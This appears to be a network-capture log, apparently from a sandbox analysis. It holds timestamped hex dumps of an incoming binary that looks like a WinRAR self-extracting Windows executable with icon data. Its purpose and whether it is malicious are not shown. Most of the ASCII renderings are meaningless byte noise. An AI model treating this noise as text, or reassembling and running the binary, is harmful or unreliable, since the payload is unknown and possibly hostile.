2021-10-13 07:59:22 UTC	242	IN	Data Raw: 1b bf fa e2 cb de fb bf a1 d3 b3 56 f8 51 76 f7 63 71 74 dc 12 5e 10 47 c7 d9 dd 8f 57 8f 8b 38 3a 6e 83 a5 3c 63 35 e6 df c9 14 17 f9 cf 7f b5 70 35 31 7f 2a 53 de a5 b3 b3 16 e2 22 ee 3f e0 3c a0 6a 8c 46 1c d7 55 8d f1 78 d5 b8 8c c3 04 d6 ad bd fc 6f d0 ff ef cf 7f 76 ef d7 bf b4 3c 7f f5 8b 93 9f fe 64 2c 65 8b f5 97 b9 e3 fe 8f 7f 34 4a 53 fb fa 08 e2 a3 c3 c3 87 2f 3c 7f 8d 21 b7 96 77 47 69 ea f0 c7 8b 9c f3 69 d6 19 18 97 76 e3 e2 92 77 dd aa d3 2e ff 35 db 4b 78 71 dd d8 e1 53 11 b0 23 55 d7 a7 19 16 e6 17 5e a7 19 17 8e 5f 98 5f 38 7e 69 eb bf 0e 55 c7 64 5c 98 77 99 77 39 7e 61 5c 98 5f 98 5f 38 7e 61 7e e1 b8 8e f9 85 e3 97 96 f9 d1 78 e4 ee b7 f1 f1 63 5f 71 51 5f 7d e5 ea a7 47 a3 e8 eb af 1d e3 32 1e 37 9f 73 47 7e fb 77 f9 dd 3b c9 df 3e Data Ascii: VQvcqt^GW8:n<c5p51*S"?<jFUxov<d,e4JS/<!wGiivw.5KxqS#U^__8~iUd\ww9~a\__8~a~xc_qQ_}G27sG~w;>
2021-10-13 07:59:22 UTC	250	IN	Data Raw: b8 10 5c 88 e0 42 70 21 b8 10 5c 08 2e 04 17 22 b8 10 5c 08 2e 04 17 82 0b c1 85 08 2e 14 a0 ff 03 66 99 e7 1a d9 b9 6c d7 00 00 00 00 49 45 4e 44 ae 42 60 82 50 41 44 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 c0 c0 c0 00 80 80 80 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00 00 00 ff 00 ff 00 ff ff 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8e fe f6 fe fe 6e fe f6 00 00 00 00 00 00 00 00 8f ef e6 ef ef 6f ef e6 60 00 00 00 00 00 00 00 8e fe f6 fe fe 6e fe f6 60 00 00 00 00 00 00 00 8f ef e6 ef ef 6f ef e6 60 60 00 00 00 00 00 00 86 66 66 66 66 0f ff f6 60 60 00 00 00 00 00 Data Ascii: \Bp!\."\..flIENDB`PAD( @no`n`o``ffff``
2021-10-13 07:59:22 UTC	258	IN	Data Raw: 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3e 0d 0a 3c 61 73 73 65 6d 62 6c 79 49 64 65 6e 74 69 74 79 0d 0a 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 30 22 0d 0a 20 20 70 72 6f 63 65 73 73 6f 72 41 72 63 68 69 74 65 63 74 75 72 65 3d 22 2a 22 0d 0a 20 20 6e 61 6d 65 3d 22 57 69 6e 52 41 52 20 53 46 58 22 0d 0a 20 20 74 79 70 65 3d 22 77 69 6e 33 32 22 2f 3e 0d 0a 3c 64 65 73 63 72 69 70 74 69 6f 6e 3e 57 69 6e 52 41 52 20 53 46 58 20 6d 6f 64 75 6c 65 3c 2f 64 65 73 63 72 69 70 74 69 6f 6e 3e 0d 0a 3c 74 72 75 73 74 49 6e 66 6f 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 Data Ascii: n:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="*" name="WinRAR SFX" type="win32"/><description>WinRAR SFX module</description><trustInfo xmlns="urn:schemas-microsoft-com:a
2021-10-13 07:59:22 UTC	266	IN	Data Raw: 6e 35 78 35 00 20 03 00 50 00 00 00 60 32 68 32 6c 32 70 32 74 32 78 32 7c 32 80 32 84 32 88 32 8c 32 90 32 9c 32 a0 32 a4 32 a8 32 ac 32 b0 32 bc 32 c0 32 c4 32 e8 32 ec 32 f0 32 f4 32 f8 32 fc 32 00 33 5c 35 60 35 64 35 68 35 6c 35 70 35 74 35 00 00 00 30 03 00 9c 00 00 00 98 30 9c 30 a0 30 a4 30 a8 30 ac 30 b0 30 b4 30 b8 30 bc 30 c0 30 c4 30 c8 30 cc 30 d0 30 d4 30 d8 30 dc 30 e0 30 e4 30 e8 30 ec 30 f0 30 f4 30 f8 30 fc 30 00 31 04 31 08 31 0c 31 10 31 14 31 18 31 1c 31 20 31 24 31 28 31 2c 31 30 31 34 31 38 31 3c 31 40 31 44 31 48 31 4c 31 50 31 54 31 58 31 5c 31 60 31 64 31 68 31 6c 31 70 31 74 31 78 31 7c 31 80 31 84 31 88 31 8c 31 90 31 94 31 98 31 9c 31 a0 31 a4 31 a8 31 ac 31 b0 31 98 33 9c 33 00 00 00 40 03 00 30 01 00 00 10 32 14 32 54 32 58 Data Ascii: n5x5 P`2h2l2p2t2x2\|2222222222222222222223\5`5d5h5l5p5t500000000000000000000000000011111111 1$1(1,1014181<1@1D1H1L1P1T1X1\1`1d1h1l1p1t1x1\|1111111111111133@022T2X
2021-10-13 07:59:22 UTC	273	IN	Data Raw: 86 28 94 23 d0 0e e7 32 90 20 e7 7c 0d 7a a8 13 5c 80 73 01 0e ec 0c 82 15 86 11 a9 e7 52 f0 6f 31 08 c8 92 df 8f 86 ea 33 1a 42 7b bb 78 b3 eb 43 d0 c8 65 b7 10 9e ca 80 f8 bf 20 56 67 c2 8a 63 2c 10 d7 4b 04 44 c5 0b ee 07 24 68 32 04 7b b1 56 d2 a7 d6 30 4a 00 9d ba 0b e9 07 32 f3 78 a6 2b ac e0 2c 4b c4 57 25 6a 8c e6 38 20 5f 83 2d ac f4 1c f3 15 b8 21 cd 96 d1 d0 95 4d 05 a5 50 c9 d6 67 84 14 f2 95 f5 5e e1 81 06 3e 5e 54 eb c2 aa 98 b1 f4 52 29 a3 06 97 94 a7 55 3f 5c c0 30 37 a5 91 e9 47 83 3d d9 b9 15 a7 60 e0 6e 0f f4 f1 d1 c1 d5 bf 3d 48 2b 00 38 d6 55 57 40 78 50 2c 21 2b 00 c4 1f aa cb 0a d4 66 b1 7b 6c b2 dd e4 48 86 62 05 68 18 41 0a 16 65 00 f6 26 4d f4 15 e8 82 97 b6 54 0c 7e 71 7b 35 40 74 27 14 ca 8b 38 e6 18 29 d0 1f 15 4c 64 54 e8 81 Data Ascii: (#2 \|z\sRo13B{xCe Vgc,KD$h2{V0J2x+,KW%j8 _-!MPg^>^TR)U?\07G=`n=H+8UW@xP,!+f{lHbhAe&MT~q{5@t'8)LdT
2021-10-13 07:59:22 UTC	281	IN	Data Raw: 4f 76 32 e9 5e 72 f6 88 00 00 fb 6e af 1d a9 dd e5 0f 00 9f bd 13 81 7c 4d 66 bb 04 22 ca f9 a3 28 88 db 56 c3 c2 3f 58 57 18 be 5f 05 43 d5 d8 f0 40 06 f8 af 5b eb 16 3f b1 77 a2 2b 26 7a fc f3 4d c8 d5 61 2f 24 b9 20 eb 28 73 47 15 ce 21 55 98 bc 64 e1 e3 5b c2 74 89 38 5a 78 59 70 e6 cc 17 7f eb 04 07 46 b4 9d 61 47 e9 08 dc 6b fe 3e 54 06 25 67 09 38 7c 04 40 79 bc 99 63 1b 98 b7 7c 77 64 c8 c9 75 85 20 be 46 cf 9e 7b 81 60 0e 06 55 a4 e9 2a 62 3e c8 fe 3c 30 cd c4 e7 2b 08 9a 3f b5 7f 2f 7c c4 94 46 eb 60 46 53 60 57 b3 50 52 b8 8c f6 6f 83 f6 61 be db 5e 00 49 24 ef b1 93 b5 40 49 6a 90 42 87 ed 05 71 1d 93 2a 5f e9 8f cd 6a 43 5d 5c 78 e0 2a 60 4c 12 fe 4a 5c 41 19 44 c8 16 9f 35 bf a4 0d 98 df 04 78 2f 9f 71 18 8b 94 1a 6a d3 59 39 42 fc 0e fc a6 Data Ascii: Ov2^rn\|Mf"(V?XW_C@[?w+&zMa/$ (sG!Ud[t8ZxYpFaGk>T%g8\|@yc\|wdu F{`Ub><0+?/\|F`FS`WPRoa^I$@IjBq_jC]\x*`LJ\AD5x/qjY9B
2021-10-13 07:59:22 UTC	289	IN	Data Raw: bb 74 cc 31 98 e8 02 ac 5d 6b b8 5b 82 d6 68 50 a8 75 75 aa 10 bd 5e 4b 85 dd 38 5e 63 58 a2 8a b1 e7 69 90 c3 08 3a 68 e3 e6 3f 81 7f 68 e2 4b 7e e0 18 65 ea 96 ef de 0a 1e 3d 16 f4 3a 87 d8 e7 a4 e7 da 76 3c 9a e4 ba f7 2f f5 39 d8 9c c8 48 ec a9 76 90 c1 b3 70 d6 94 56 7b 6c 1e 34 b6 a8 68 ff 7c 78 9f 6b fe 26 03 c9 b0 a8 93 8a 2e 69 93 f8 da 44 c3 54 41 ea 1a 95 55 c5 ed 0b b5 0e 26 24 2c 4a 09 10 43 09 c4 7a 0a d6 10 d1 a6 b6 89 21 4b ac 9b d2 94 c0 6e c9 2d 0e 43 6b 33 d2 25 b1 7f 0e 6d bd c2 f3 b7 9e 52 50 1e e7 5e bb 62 20 42 ad 64 e1 2d 1c 8d a2 e6 f7 8b 0c 78 ba 91 72 09 06 ae 8c d4 6a 71 d3 4b e2 7e 17 bc 54 99 8f 45 3b 33 a0 f4 30 35 8a e7 4f f6 d1 41 cb 9d c3 ab c7 9a de b7 b2 73 90 0d 74 a2 f7 aa d5 d1 07 85 85 a6 d6 54 8c e1 62 7c 13 c5 c7 Data Ascii: t1]k[hPuu^K8^cXi:h?hK~e=:v</9HvpV{l4h\|xk&.iDTAU&$,JCz!Kn-Ck3%mRP^b Bd-xrjqK~TE;305OAstTb\|
2021-10-13 07:59:22 UTC	297	IN	Data Raw: 15 81 6a 0d 83 81 70 04 d6 59 b1 08 d6 20 81 d0 6d 4c 7c 18 ed c9 81 b2 43 38 f2 46 ea 63 9d 05 ce a4 26 e3 0f 73 ed 87 0b 8f 42 4a 78 9b 09 ca 7a 83 29 c1 ee 34 5d ff 86 f8 6a 23 b2 45 50 7a ae be af e6 69 62 da ec b8 48 a1 71 2d 33 1a 38 f6 f0 9b f7 f0 96 98 b5 9b 65 06 cb 01 5c e3 00 80 62 d1 d0 aa 3d 70 a2 77 e6 de 1f da 08 b6 01 1b 86 19 17 84 5e 78 92 1c b2 9e 99 e7 31 74 55 13 c0 8d e9 49 33 d8 46 be 39 81 2a be 26 79 0b 9b c6 d0 15 41 32 48 18 23 89 5c 0d 68 0e 5e 51 3a 02 0e b4 29 68 20 c5 9e 5c c8 ba b1 32 ce 33 fa 22 8b a1 d3 00 95 31 bb 32 d7 fa 7f ec 03 3a 8d b0 1b 40 0e 6b c3 b5 a2 1f 68 5d b2 2f c9 98 56 c6 38 37 78 9a 14 8d 1d 7b ad b6 c2 1c 02 da 21 2f 9b 97 22 a8 19 cf ef 23 15 7f 5f f1 1d 33 25 e8 f5 3c 43 34 13 49 48 3d e1 89 15 4a 05 Data Ascii: jpY mL\|C8Fc&sBJxz)4]j#EPzibHq-38e\b=pw^x1tUI3F9*&yA2H#\h^Q:)h \23"12:@kh]/V87x{!/"#_3%<C4IH=J
2021-10-13 07:59:22 UTC	305	IN	Data Raw: 48 46 10 84 1f df 4a f7 da d3 1b aa df f1 91 5b 5d 78 4b 7b c5 9e f7 bb 1d 70 ba 96 a4 b4 d4 d2 0b c1 c3 d1 f4 f9 10 52 01 11 14 0e cf c2 8d 97 e1 3e 41 dd 32 f2 53 42 37 84 df 20 b6 1d 77 52 0f e5 4c 97 e6 a0 b3 59 86 64 99 fc 2a b5 38 3f dd 88 7a 25 66 29 b6 62 58 92 30 6f fc 0d ef f1 54 87 8a 49 5e df 28 be be 28 27 ea 57 82 fa e5 24 ad ef 86 76 2e f9 5b b8 26 f8 e5 f4 2f 5f ca e1 1f 9a 95 e2 b6 54 50 2a 04 1e 2f 96 2b 19 03 c6 55 5f 13 85 2a 88 fa 8d 42 19 0c 4b cd f6 cb 0b 54 0b 30 48 ae 82 50 8b e2 2d 5b 61 c0 49 a5 a8 6d 2e a5 8a 99 32 e3 4e f5 40 64 0d 19 63 5a 24 31 8c cb 2c 5e b8 79 cb 1a 02 ed bf 3c 04 f6 03 65 8d ae 99 e2 94 59 a5 be 30 05 69 46 20 29 79 c0 49 93 a7 40 29 af 00 81 4b 4b 6f 47 73 86 1e a9 00 82 64 1e 52 b0 cd f8 6d 52 91 da 29 Data Ascii: HFJ[]xK{pR>A2SB7 wRLYd8?z%f)bX0oTI^(('W$v.[&/_TP/+U_*BKT0HP-[aIm.2N@dcZ$1,^y<eY0iF )yI@)KKoGsdRmR)
2021-10-13 07:59:22 UTC	313	IN	Data Raw: 5b 74 70 3f ae 0a c8 b8 60 b4 4d fb 92 44 40 9a cb 79 d9 98 88 d3 19 56 b6 1d 13 ec af b4 71 70 44 fc 0d 7e bc 5a b1 9b c0 c5 f3 e1 bc 84 18 52 23 5d b3 62 df af 11 2d aa 69 4c b2 7e f9 b0 48 49 49 c5 58 7b d3 d8 b3 7b 90 96 05 ad 57 72 b3 d9 16 11 b3 3d f4 e6 96 a9 3c 42 7e d0 c6 43 f3 bd a6 f0 cc b0 f9 5e f5 6a df 14 6e 72 ad dc 1a ab 05 85 77 7b 90 17 19 64 e2 3e 28 2d 1b 0f 65 be 67 db 8e 4b 5f 42 c3 f1 e2 24 a0 3f 0c 29 52 1e 02 82 01 d3 aa 79 cf 2b a3 89 60 d9 fe 6b 41 79 d4 3b 48 1a 0a fd a7 3f 66 9b ee 25 62 5a d8 32 ca c8 8a ef 01 54 2a 51 6e 4d d3 c9 33 14 6f b8 67 a2 3a c8 da 73 19 dc 9b 9c 1f c6 fe 67 02 58 2d be b6 05 f2 a4 27 af ae 49 a6 96 94 7b 42 ad 65 5d 08 49 69 a9 07 17 0c d0 81 a5 7b 60 92 a9 bb 3d 71 ac 81 74 20 4e 02 46 f6 a3 9e 0a Data Ascii: [tp?`MD@yVqpD~ZR#]b-iL~HIIX{{Wr=<B~C^jnrw{d>(-egK_B$?)Ry+`kAy;H?f%bZ2T*QnM3og:sgX-'I{Be]Ii{`=qt NF
2021-10-13 07:59:22 UTC	320	IN	Data Raw: 84 33 d0 f5 be 26 4c 58 c1 19 7f e1 02 b2 d0 51 43 d2 29 55 8d e7 09 60 6d 51 54 d8 cf ea 41 8a 20 a4 57 86 e3 22 23 06 54 51 95 e1 01 7f 8f 5f 3e b1 d0 d5 da a6 ac 2e 51 59 20 39 7d e2 4d e2 39 0d ac 14 95 68 f4 93 78 9b 5f 72 08 2e 3e 18 72 24 27 f3 cf 8b b0 63 8c c6 f8 95 f9 aa b7 d1 d6 bd 2a 20 83 12 07 9a 80 44 0c 09 21 2b 4d 49 5c 86 32 74 17 7a 4c b9 0f c5 1f de 09 38 5d 42 ed f2 8a 10 d7 4f 8e d6 50 5e ab 01 d4 9b 85 ac ca 19 73 42 b7 65 7a 6b a5 70 0e f4 f3 71 82 e9 8a b3 55 cb 07 ad 2a 72 fc 99 b6 b8 99 45 9c 61 df c0 a0 87 83 83 d0 3a 56 7f ad 2a e4 27 0d 92 be c7 26 5d a4 65 ec 66 91 fc 08 e8 8a 4b 23 65 2c c9 22 de 1a 89 b3 0c f6 c9 83 c5 c0 7d c9 08 a2 69 c2 62 52 3a b5 09 e1 ae 4b 87 a9 6a 0c b7 f9 0d 92 d8 d5 2a 47 58 a3 56 5a d5 c5 d0 5b Data Ascii: 3&LXQC)U`mQTA W"#TQ_>.QY 9}M9hx_r.>r$'c* D!+MI\2tzL8]BOP^sBezkpqUrEa:V'&]efK#e,"}ibR:Kj*GXVZ[
2021-10-13 07:59:22 UTC	328	IN	Data Raw: b8 d2 a0 75 7b 2b 5a 7d 9f 42 d0 c2 31 e4 8c b6 f1 44 19 13 25 f0 71 c7 7e cd 49 b4 3b 40 99 c1 9d a8 4c b9 73 da 4a 8f f8 a1 50 27 51 2f a0 f8 06 ab 98 52 4c 7c 34 94 b9 7f f4 fb de 25 d0 09 00 69 e0 a6 a2 ab 45 24 ca 8a 7a 03 35 0c f4 94 f3 8f b3 37 1b f0 56 2f b8 13 e2 3f 7f ff 4c e8 24 7f b8 3c 31 a6 20 39 7d 66 83 53 16 6a 9d 66 92 3a 7b 0f 28 50 4f 9f 38 9b e9 05 4b 95 c4 fc 07 99 17 d1 77 e5 b5 38 e2 87 2c 6f 33 74 d6 93 21 43 76 c9 de 5b 81 fa 5b 64 d9 0b 61 be f8 9c 07 9b 72 c8 4b 1d 30 0f 8c 07 d6 be 1e 48 65 ba 88 7f 31 1f c2 f1 47 fc f4 9c b9 0c f4 16 11 e0 0d 0a 5f 89 57 a8 63 ee 75 57 36 3c e0 0e 24 8f 79 9b a4 b8 bd 26 77 3e 6a c3 e7 46 c3 f4 0a 4c 64 1e 14 88 17 c6 2d e5 bd 08 29 be 94 e2 60 eb 45 fa d6 ab a7 a1 fb f7 eb 80 55 fe 54 28 b2 Data Ascii: u{+Z}B1D%q~I;@LsJP'Q/RL\|4%iE$z57V/?L$<1 9}fSjf:{(PO8Kw8,o3t!Cv[[darK0He1G_WcuW6<$y&w>jFLd-)`EUT(
2021-10-13 07:59:22 UTC	336	IN	Data Raw: 07 6a 46 de d4 df 18 cc 9d 16 8b 74 db f0 8c da fa 6a 2a b0 00 ce 08 7c a7 5e 93 38 b5 0f 5f 24 d8 f5 c1 4f ba 08 cb 59 56 59 99 4f 20 ee 5b 5b 62 e8 b5 2d fe 2a 1d 03 2e f5 8c ea b8 3c f1 50 00 44 18 3b aa 27 2b 94 4d 6a 90 89 40 98 2d 6c e9 11 33 0e 26 25 b2 84 70 4d e2 d4 db 36 84 6a 26 66 28 e1 be 00 79 e9 31 ad 23 e3 b9 4c f4 95 cf f6 c6 cc 42 73 e0 58 ff 82 92 68 a3 11 90 57 70 d6 0e 5a 70 1f 1d 3e a7 02 f9 a2 e4 f9 e7 ba 91 30 20 f2 40 36 8e b4 48 cf a9 30 c8 4f d2 d9 5d 23 6f d1 ec ee c1 ad b9 17 8d 2d 11 10 11 c7 c5 c4 be ae 53 8a 18 59 4c 5a b5 fd 5d 35 5b 66 a1 16 48 04 27 5c d7 46 4a f9 40 84 f6 ff a8 35 56 19 ca d6 88 be 19 29 51 40 cd f2 0a 05 2a ed 3f 29 02 80 46 e1 d9 45 23 2f f2 de c3 19 07 0b 31 5f 10 a6 36 96 19 f2 36 03 da 4b 9c 2d 7e Data Ascii: jFtj\|^8_$OYVYO [[b-.<PD;'+Mj@-l3&%pM6j&f(y1#LBsXhWpZp>0 @6H0O]#o-SYLZ]5[fH'\FJ@5V)Q@*?)FE#/1_66K-~
2021-10-13 07:59:22 UTC	344	IN	Data Raw: d4 5b 3d 31 c1 68 96 64 69 62 7b 50 31 16 f3 b1 2e 60 d7 42 b4 0f 49 d2 42 f6 ef 7b e7 15 81 f6 57 21 f5 68 ae 59 50 28 b3 00 54 d6 ed 02 48 14 87 6b 92 65 1e e1 90 14 70 a6 94 14 80 dc f9 98 2f 1e aa cc a0 64 9c 4b 7d 3e 61 45 b5 d6 2a f5 ae 4e 82 32 af 23 35 71 b3 ae f9 0a 55 bb fb a3 66 71 e0 e9 26 c4 ec 60 09 ff 93 34 1c 9d ae ff c9 63 f2 c0 49 1c ba 95 c5 09 05 50 7a f0 c5 65 6d 0d b5 fa cc c7 00 08 ee 88 55 3b 13 eb b8 36 fb d4 7e 5c 55 b5 be a0 21 44 66 78 88 8e 96 66 38 87 7d 32 01 69 97 3f ce 99 a6 f5 33 09 3f 12 13 d5 1c 22 5c 48 09 c0 bf af f8 a2 d5 0c b8 78 6b 11 63 05 d2 9b 43 3b 33 fd 0d ef 07 6e 5d a7 91 22 a5 61 09 e5 13 cb 33 fc 93 18 50 28 25 2e ce 93 91 ed 2c b1 78 14 cf a8 5e de 19 0c 81 65 b3 77 94 a5 c1 51 f2 66 4a a2 ba 6d a3 ef ba Data Ascii: [=1hdib{P1.`BIB{W!hYP(THkep/dK}>aE*N2#5qUfq&`4cIPzemU;6~\U!Dfxf8}2i?3?"\HxkcC;3n]"a3P(%.,x^ewQfJm
2021-10-13 07:59:22 UTC	352	IN	Data Raw: 4e 81 2c c2 e0 d1 d0 02 fd d0 29 ef bc 29 c1 a7 03 4c 7b a1 8d e1 c5 61 ca 90 c2 cd e1 1d 77 3d b3 50 9e 45 32 fb 2c 92 37 c5 c4 8a 41 85 a2 f3 a0 08 b7 5f 74 f4 25 7b 32 5d 10 11 0e 2e d9 76 4c 5d 6f 26 0b d5 be d5 95 dc 38 53 4d e5 25 42 dc d5 d7 cd 80 4b 6d 78 b5 c9 a1 0c a6 82 ad 99 5a 03 54 2b bc 25 72 90 62 90 5a c2 a6 36 e2 1b bc b3 af e7 64 5d 1a 31 a5 4d da 81 de b2 44 a4 0d d6 f9 24 97 7b 58 94 21 f0 8e 97 65 c8 46 c3 cc f5 4d e0 5a 6a b1 88 c2 81 46 6f ba b2 85 1d 07 fc 69 b2 a4 94 34 ca 1c d4 60 dd ad 6a 44 8d 25 33 b2 e0 1f 39 c1 b2 09 8f 1e 07 5b ae 6c 1d 71 df 8b 8a 38 3c 4a bd ce 98 20 44 b9 81 08 ee eb 4b 0d a5 58 f9 a7 f0 0a 5d 29 26 08 a1 c1 e1 e8 4a d4 44 b0 6e 1a d4 d3 e4 ab 7e 25 5b 01 ab 95 56 a9 80 f3 02 60 19 ac 65 70 aa 17 dd d7 Data Ascii: N,))L{aw=PE2,7A_t%{2].vL]o&8SM%BKmxZT+%rbZ6d]1MD${X!eFMZjFoi4`jD%39[lq8<J DKX])&JDn~%[V`ep
2021-10-13 07:59:22 UTC	359	IN	Data Raw: 69 a6 e1 cf 79 26 48 ea 68 f1 c5 24 59 4e dd 65 76 53 51 d8 c8 fb 73 61 7c cf 5c 78 67 7c 79 de 25 ae ee b0 fb cc cd 7c 0b ba af 97 19 7e 7f 02 3b 3e 86 a3 bf 78 5c 0f 19 3c 30 42 f0 b5 18 0b 8d 36 12 4d cc 6c e0 e1 d3 de ea 12 64 db 5f 5e 91 69 f5 00 86 54 54 e2 a9 65 ca dc 93 50 c7 8c e7 79 01 76 85 c4 5e 5a ab 86 56 9c 91 8d f2 a1 ff cf 09 07 be 2d c8 8a dd ea 99 4e 65 62 07 4c 40 a9 13 1c ef 29 5f d2 38 f1 de a9 02 89 b0 44 ee c2 42 5c e7 3d 33 c7 14 8f b8 de 16 3f 98 05 ce fe b3 50 24 82 a1 d0 18 c7 6e 12 bf 30 35 9a 15 ec a4 c5 6d 36 e6 9c f9 9d 07 c0 0f 85 73 28 f1 79 12 24 82 44 1e d8 9b a9 d1 1b e9 ef 67 d5 91 89 de 4e 5d 70 e9 15 89 19 17 8b cf fa fe f8 37 d6 21 92 70 0e 4d da 8b 44 02 63 9c 20 91 f3 3a 62 fb 85 aa 2a be c9 de f0 94 50 3d ac 5d Data Ascii: iy&Hh$YNevSQsa\|\xg\|y%\|~;>x\<0B6Mld_^iTTePyv^ZV-NebL@)_8DB\=3?P$n05m6s(y$DgN]p7!pMDc :b*P=]
2021-10-13 07:59:22 UTC	367	IN	Data Raw: a0 c0 99 8d 1c d8 4f b1 57 d6 38 9e 22 8b 59 59 25 13 a2 39 ad 80 2b 3e 7d 4c d6 ea fa d4 33 db e8 c1 dc b3 b3 db e1 9b ac 9a c5 8e 1c 9d d6 c7 4e f8 fc 76 da 1f a0 da b9 e0 d2 e1 99 af 23 a2 5a d3 c2 52 71 e5 ba d3 73 c3 a2 c0 5f 25 b9 76 20 5d 96 5f 59 29 c1 3a 65 61 7f 36 fd a6 b9 6b 7d ed 40 f7 55 34 5a c4 40 16 d3 79 5c f7 fd dc 36 94 a8 13 53 68 30 ae 79 3b 7a 2d cb cb 80 7f 65 e1 f2 a5 98 8a 4a cf d0 1d 9c b6 66 99 a7 4e 74 cc f2 08 0b e2 56 57 03 5f 2c b9 fe 79 73 5a 25 17 bd 5c f7 03 e2 77 1f c7 38 50 41 dc 87 b5 74 7e f2 b3 a2 9f 09 95 94 71 ff ca 77 32 7f e7 d1 e8 eb 71 02 0f 29 64 2a ae ef 5f 2b 75 88 6a f8 56 4a d2 a3 b2 bc f9 97 b9 de 1a 9e a2 c6 4f 4f 36 6f 23 48 a9 be dd b6 0e f6 87 01 6e 4a af 3e b1 6e 6e 4b bb 9d c7 d4 82 b6 85 45 b8 74 Data Ascii: OW8"YY%9+>}L3Nv#ZRqs_%v ]_Y):ea6k}@U4Z@y\6Sh0y;z-eJfNtVW_,ysZ%\w8PAt~qw2q)d*_+ujVJOO6o#HnJ>nnKEt
2021-10-13 07:59:22 UTC	375	IN	Data Raw: 71 5c 63 44 0a 91 15 22 0a f6 40 1a d7 a7 96 92 0d 88 bd 01 4a 66 32 3d e8 57 66 de 40 1b 0f b5 f1 25 b7 81 64 9f f1 58 26 37 98 14 07 bb 31 97 83 ad ca 52 5a dc 02 59 d2 58 9c 1b ef 64 2c 9f 72 f1 9e 08 bb 4b b4 08 aa 79 9a 36 a5 ea 0c 78 cf 48 95 0e 85 b2 5a 4c 48 76 cd 4e 4b 4e ec 74 a1 bf 10 da 3d d0 9a 06 78 47 1c d9 05 ed 66 38 e5 66 df 67 a8 16 e3 d1 52 f4 fe 6b c7 f9 a1 48 3d b4 f0 7d 37 ef 2e 03 2d 32 12 c0 78 29 4a 01 65 4a 80 e9 05 38 c4 74 f4 99 37 cd ba 7f 7e 18 a2 d8 bc 03 41 f9 39 c6 c1 c5 32 7a 88 ab f4 4c fe f5 8f 8f 3e 99 ea ae 59 d0 11 28 f2 55 1b 4d 0b 61 b7 84 0a 6d 55 23 06 56 69 14 81 26 05 a5 10 4d a0 9c 25 03 80 c8 04 82 2a 0c 67 56 a6 77 7b 76 c2 f4 95 a6 7c 20 dd 51 d4 80 cb 73 5d f7 5c 04 b0 e7 dd 29 c0 4c 2d 77 f4 83 5e 25 88 Data Ascii: q\cD"@Jf2=Wf@%dX&71RZYXd,rKy6xHZLHvNKNt=xGf8fgRkH=}7.-2x)JeJ8t7~A92zL>Y(UMamU#Vi&M%*gVw{v\| Qs]\)L-w^%
2021-10-13 07:59:22 UTC	383	IN	Data Raw: 7f ab e2 2a 75 b3 f2 07 8d 55 46 4b a8 2b b3 97 72 11 85 b5 78 db c5 da 57 8b f1 11 42 b3 3b 79 c6 16 15 5e f2 f7 09 b1 93 ce 8f f1 96 43 d9 25 eb c7 4b 18 75 9d 8a fc 59 69 1d a3 61 51 53 84 45 1c 2d ac 17 6b 76 c1 14 c3 13 72 0a 4d 0d ed a4 69 75 9d b6 09 1a 40 6d 01 5e 3a 90 75 01 e5 39 15 02 9c 55 a1 2c dd 8c ae 57 38 91 5b 85 ef 01 98 d1 87 aa a3 51 58 fc 6b ee 16 7a 22 fc ce c0 eb 48 f2 7a 9e cf 6e 06 93 6d 91 35 a5 32 63 32 d9 5f 57 19 4c 7a fe 8a b1 a7 06 61 97 0a 33 0c 8b 74 9a 5e a7 97 2b a1 4c ca 69 17 5d 3b 7d 60 1a a6 07 72 bd bf 4d 41 3d 54 67 04 e1 6a 5a 1c e4 a2 22 4d 96 af cb 25 83 59 f9 ba 8f 2c 0a e5 50 87 69 ae 8c b2 57 9c 4e a5 d3 6c 04 58 6f a8 52 55 f0 19 93 ee 05 ab cf 21 dd 23 3b bc de b0 65 ce 51 25 56 9c 8f 43 b6 c2 7a 4d 1b 42 Data Ascii: *uUFK+rxWB;y^C%KuYiaQSE-kvrMiu@m^:u9U,W8[QXkz"Hznm52c2_WLza3t^+Li];}`rMA=TgjZ"M%Y,PiWNlXoRU!#;eQ%VCzMB
2021-10-13 07:59:22 UTC	391	IN	Data Raw: 46 fc c4 fa 50 9e fc c0 71 60 54 5a 9a b2 0e 03 d3 6e 35 4c cd a8 9c 4a 42 06 93 a7 6b 49 0f 52 9f 1f 16 4a e2 a3 6e ab 0e 59 90 59 46 fd 12 74 10 54 0f 12 ae b6 2d b7 55 90 2d 89 ef 86 01 9c c6 2d 85 ce 26 bb d1 4c e2 03 95 95 54 8b 53 16 82 2d 5f da 01 f6 91 4a 82 bf 10 9c 5c 32 71 a5 e8 09 b6 11 84 78 24 ee 9e 67 a3 56 35 ff 45 e5 b8 73 bc 1f 37 4b b8 61 6d 78 db db 40 71 19 9d 8d 7d 78 9e 2b f3 10 53 cc 1b d9 a0 90 c9 8c 58 9f 65 51 67 d1 06 34 4a 5d 3d 76 94 44 d2 e1 94 4a 22 5d f9 87 23 29 87 a4 41 7c c3 28 99 c1 4f a6 71 71 c8 bd aa d9 63 f3 ae bb 6d e6 9e a2 35 38 9b d7 e3 3e fe 97 23 77 3f 57 e9 44 a6 cc 70 51 d0 c4 48 a5 22 3f 67 1a dd 78 bd 2f b7 79 53 42 0d d6 e5 9a eb 10 ac d4 70 9f 85 a8 37 c5 df a6 52 d7 5f 1b f3 98 94 f8 33 7b 1c 00 6d c8 Data Ascii: FPq`TZn5LJBkIRJnYYFtT-U--&LTS-_J\2qx$gV5Es7Kamx@q}x+SXeQg4J]=vDJ"]#)A\|(Oqqcm58>#w?WDpQH"?gx/ySBp7R_3{m
